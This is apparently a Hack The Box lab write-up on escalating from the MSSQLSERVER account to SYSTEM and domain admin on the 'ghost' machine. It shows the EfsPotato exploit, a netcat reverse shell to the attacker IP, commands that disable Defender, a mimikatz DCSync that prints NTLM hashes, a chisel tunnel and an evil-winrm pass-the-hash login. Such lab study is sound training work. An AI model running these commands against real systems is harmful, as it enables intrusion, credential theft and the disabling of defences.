EfsPotato
As discovered previously, the mssqlserver account has both SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege set.
This makes the target system vulnerable to the potato exploits
Given the PRIMARY virtual host is a fairly newer system, I will be using EfsPotato, leveraging efsrpc via MS-EFSR
Exploit
Exploit repo can be found online
I could technically use SweetPotato, which is a collection of potato exploits including efspotato, but given the binary is fairly large and the presence of AV, I will opt out to a simpler method
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ git clone https://github.com/zcgonvh/EfsPotato
Cloning into 'EfsPotato'...
remote: Enumerating objects: 28, done.
remote: Counting objects: 100% (28/28), done.
remote: Compressing objects: 100% (27/27), done.
remote: Total 28 (delta 7), reused 7 (delta 1), pack-reused 0
Receiving objects: 100% (28/28), 73.30 KiB | 1.56 MiB/s, done.
Resolving deltas: 100% (7/7), done.Downloading it to Kali
Exploitation
PS C:\tmp> curl http://10.10.14.61/EfsPotato/EfsPotato.cs -o C:\tmp\EfsPotato.csTransferring the source code of the exploit.
PS C:\tmp> C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618
Microsoft (R) Visual C# Compiler version 4.8.4161.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.
This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240I will compile it locally using csc.exe
PS C:\tmp> ls
Directory: C:\tmp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/16/2024 10:37 AM 25441 EfsPotato.cs
-a---- 7/16/2024 10:43 AM 17920 EfsPotato.exe There is the compiled binary; EfsPotato.exe
PS C:\tmp> .\EfsPotato.exe
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]
usage: EfsPotato <cmd> [pipe]
pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)There are 5 different pipes to leverage. All of them would likely work because they all are up by default
PS C:\tmp> .\EfsPotato.exe whoami efsrpc
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]
[+] Current user: NT Service\MSSQLSERVER
[+] Pipe: \pipe\efsrpc
[!] binding ok (handle=6734a0)
[+] Get Token: 884
[!] process with pid: 3372 created.
==============================
nt authority\systemCode Execution confirmed
PS C:\tmp> .\EfsPotato.exe "C:\tmp\nc.exe 10.10.14.61 3333 -e powershell" efsrpc
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]
[+] Current user: NT Service\MSSQLSERVER
[+] Pipe: \pipe\efsrpc
[!] binding ok (handle=ededa0)
[+] Get Token: 884
[!] process with pid: 1920 created.
==============================Executing reverse shell
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ nnc 3333
listening on [any] 3333 ...
connect to [10.10.14.61] from (UNKNOWN) [10.10.11.24] 56808
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\tmp> whoami
whoami
nt authority\system
PS C:\tmp> hostname
hostname
PRIMARY
PS C:\tmp> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.0.0.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.0.254System Level Compromise on the PRIMARY host
Hashdump
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true
PS C:\> Set-MpPreference -DisableIOAVProtection $true
PS C:\> Set-MpPreference -DisableScriptScanning 1AV disarmed
PS C:\tmp> curl http://10.10.14.61/mimikatz.exe -o C:\tmp\mimikatz.exeTransferring mimikatz
PS C:\tmp> .\mimikatz.exe "lsadump::dcsync /dc:primary.corp.ghost.htb /domain:CORP.GHOST.HTB /all /csv exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /dc:primary.corp.ghost.htb /domain:CORP.GHOST.HTB /all /csv exit
[DC] 'CORP.GHOST.HTB' will be the domain
[DC] 'primary.corp.ghost.htb' will be the DC server
[DC] Exporting domain 'CORP.GHOST.HTB'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt 69eb46aa347a8c68edb99be2725403ab 514
1103 GHOST$ dae1ad83e2af14a379017f244a2f5297 2080
500 Administrator 41515af3ada195029708a53d941ab751 512
1000 PRIMARY$ 27f92da5e3d79962020ddebc08ed7d70 532480Dumping hashes
Since the current PowerShell session is unstable, I will opt out to tunneling
Tunneling
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ chisel server -p 55555 --reverse -v
2024/07/18 20:06:39 server: Reverse tunnelling enabled
2024/07/18 20:06:39 server: Fingerprint +R2znUFgeImf1ve50KHtDRdQR4RcwTX2rvufrDjWkTE=
2024/07/18 20:06:39 server: Listening on http://0.0.0.0:55555
PS C:\tmp> curl http://10.10.14.61/chiselx64.exe -o .\chiselx64.exe
PS C:\tmp> Start-Process cmd.exe -ArgumentList "/c C:\tmp\chiselx64.exe client 10.10.14.75:55555 R:48823:socks"
Tunnel created
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ proxychains4 -q evil-winrm -i 127.0.0.1 -u administrator -H 41515af3ada195029708a53d941ab751
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
ghost-corp\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
PRIMARY
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.0.0.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.0.254PowerShell session re-established via evil-winrm This is also for the purpose of SAFE file transfer
PRIMARY
*Evil-WinRM* PS C:\tmp> Get-ADUser -FIlter *
DistinguishedName : CN=Administrator,CN=Users,DC=corp,DC=ghost,DC=htb
Enabled : True
GivenName :
Name : Administrator
ObjectClass : user
ObjectGUID : c5e3525b-fe09-4833-8077-3daa57ab4ea7
SamAccountName : Administrator
SID : S-1-5-21-2034262909-2733679486-179904498-500
Surname :
UserPrincipalName :
DistinguishedName : CN=Guest,CN=Users,DC=corp,DC=ghost,DC=htb
Enabled : False
GivenName :
Name : Guest
ObjectClass : user
ObjectGUID : d3dbe70d-cfa9-4d5c-b0d5-664ef60b08d1
SamAccountName : Guest
SID : S-1-5-21-2034262909-2733679486-179904498-501
Surname :
UserPrincipalName :
DistinguishedName : CN=krbtgt,CN=Users,DC=corp,DC=ghost,DC=htb
Enabled : False
GivenName :
Name : krbtgt
ObjectClass : user
ObjectGUID : 7db0ab63-3f15-4c39-a523-98816907eaff
SamAccountName : krbtgt
SID : S-1-5-21-2034262909-2733679486-179904498-502
Surname :
UserPrincipalName :
DistinguishedName : CN=GHOST$,CN=Users,DC=corp,DC=ghost,DC=htb
Enabled : True
GivenName :
Name : GHOST$
ObjectClass : user
ObjectGUID : 6a5c624b-27e1-4e81-8e84-e0c7fc05657f
SamAccountName : GHOST$
SID : S-1-5-21-2034262909-2733679486-179904498-1103
Surname :
UserPrincipalName : Listing up all the AD users in the current domain(CORP.GHOST.HTB), the PRIMARY$ account is NOWHERE to be found
However, there is an interesting account; GHOST$
PRIMARY$
*Evil-WinRM* PS C:\tmp> Get-ADUser PRIMARY$
Get-ADUser : Cannot find an object with identity: 'PRIMARY$' under: 'DC=corp,DC=ghost,DC=htb'.
At line:1 char:1
+ Get-ADUser PRIMARY$
+ ~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (PRIMARY$:ADUser) [Get-ADUser], ADIdentityNotFoundException
+ FullyQualifiedErrorId : ActiveDirectoryCmdlet:Microsoft.ActiveDirectory.Management.ADIdentityNotFoundException,M
icrosoft.ActiveDirectory.Management.Commands.GetADUser
*Evil-WinRM* PS C:\tmp> Get-ADComputer PRIMARY$ -Properties *
AccountExpirationDate :
accountExpires : 9223372036854775807
AccountLockoutTime :
AccountNotDelegated : False
AllowReversiblePasswordEncryption : False
AuthenticationPolicy : {}
AuthenticationPolicySilo : {}
BadLogonCount : 0
badPasswordTime : 0
badPwdCount : 0
CannotChangePassword : False
CanonicalName : corp.ghost.htb/Domain Controllers/PRIMARY
Certificates : {}
CN : PRIMARY
codePage : 0
CompoundIdentitySupported : {False}
countryCode : 0
Created : 1/31/2024 6:34:00 PM
createTimeStamp : 1/31/2024 6:34:00 PM
Deleted :
Description :
DisplayName :
DistinguishedName : CN=PRIMARY,OU=Domain Controllers,DC=corp,DC=ghost,DC=htb
DNSHostName : PRIMARY.corp.ghost.htb
DoesNotRequirePreAuth : False
dSCorePropagationData : {1/31/2024 6:34:01 PM, 12/31/1600 4:00:01 PM}
Enabled : True
HomedirRequired : False
HomePage :
instanceType : 4
IPv4Address : 10.0.0.10
IPv6Address : ::1
isCriticalSystemObject : True
isDeleted :
KerberosEncryptionType : {RC4, AES128, AES256}
LastBadPasswordAttempt :
LastKnownParent :
lastLogoff : 0
lastLogon : 133656371495722858
LastLogonDate : 7/16/2024 1:49:07 PM
lastLogonTimestamp : 133656365478037323
localPolicyFlags : 0
Location :
LockedOut : False
logonCount : 113
ManagedBy :
MemberOf : {}
MNSLogonAccount : False
Modified : 7/16/2024 1:49:07 PM
modifyTimeStamp : 7/16/2024 1:49:07 PM
msDFSR-ComputerReferenceBL : {CN=PRIMARY,CN=Topology,CN=Domain System
Volume,CN=DFSR-GlobalSettings,CN=System,DC=corp,DC=ghost,DC=htb}
msDS-GenerationId : {74, 131, 42, 8...}
msDS-SupportedEncryptionTypes : 28
msDS-User-Account-Control-Computed : 0
Name : PRIMARY
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory : CN=Computer,CN=Schema,CN=Configuration,DC=ghost,DC=htb
ObjectClass : computer
ObjectGUID : 12591b27-1b8c-48a1-b436-4f1e0f6c712e
objectSid : S-1-5-21-2034262909-2733679486-179904498-1000
OperatingSystem : Windows Server 2022 Datacenter
OperatingSystemHotfix :
OperatingSystemServicePack :
OperatingSystemVersion : 10.0 (20348)
PasswordExpired : False
PasswordLastSet : 6/17/2024 9:51:07 AM
PasswordNeverExpires : False
PasswordNotRequired : False
PrimaryGroup : CN=Domain Controllers,CN=Users,DC=corp,DC=ghost,DC=htb
primaryGroupID : 516
PrincipalsAllowedToDelegateToAccount : {}
ProtectedFromAccidentalDeletion : False
pwdLastSet : 133631166674475283
rIDSetReferences : {CN=RID Set,CN=PRIMARY,OU=Domain Controllers,DC=corp,DC=ghost,DC=htb}
SamAccountName : PRIMARY$
sAMAccountType : 805306369
sDRightsEffective : 15
serverReferenceBL : {CN=PRIMARY,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=g
host,DC=htb}
ServiceAccount : {}
servicePrincipalName : {ldap/PRIMARY.corp.ghost.htb/DomainDnsZones.corp.ghost.htb,
ldap/PRIMARY.corp.ghost.htb/ForestDnsZones.ghost.htb,
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/PRIMARY.corp.ghost.htb,
TERMSRV/PRIMARY...}
ServicePrincipalNames : {ldap/PRIMARY.corp.ghost.htb/DomainDnsZones.corp.ghost.htb,
ldap/PRIMARY.corp.ghost.htb/ForestDnsZones.ghost.htb,
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/PRIMARY.corp.ghost.htb,
TERMSRV/PRIMARY...}
SID : S-1-5-21-2034262909-2733679486-179904498-1000
SIDHistory : {}
TrustedForDelegation : True
TrustedToAuthForDelegation : False
UseDESKeyOnly : False
userAccountControl : 532480
userCertificate : {}
UserPrincipalName :
uSNChanged : 131114
uSNCreated : 12293
whenChanged : 7/16/2024 1:49:07 PM
whenCreated : 1/31/2024 6:34:00 PMThat’s because PRIMARY$ is a machine account